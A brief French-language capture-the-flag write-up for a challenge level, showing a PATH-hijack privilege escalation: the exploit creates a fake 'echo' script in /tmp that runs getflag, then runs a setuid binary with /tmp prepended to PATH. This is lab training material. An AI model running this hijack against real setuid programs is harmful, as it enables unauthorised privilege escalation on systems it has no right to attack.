14 lines
410 B
Plaintext
14 lines
410 B
Plaintext
On peut voir qu'il y a un executable level03 appartenant a flag03.
|
|
Ce fichier execute: echo "Exploit me"
|
|
|
|
on peut donc changer le PATH. Cree un fichier executable nomme echo dans /tmp qui execute getflag
|
|
On donne les droit d'execution au ficher
|
|
|
|
$ echo -e '#!/bin/bash \x0a getflag' > /tmp/echo && chmod 777 /tmp/echo
|
|
|
|
on execute level03 de cette maniere :
|
|
|
|
PATH=/tmp:$PATH ./level03
|
|
|
|
On obtient alors le flag
|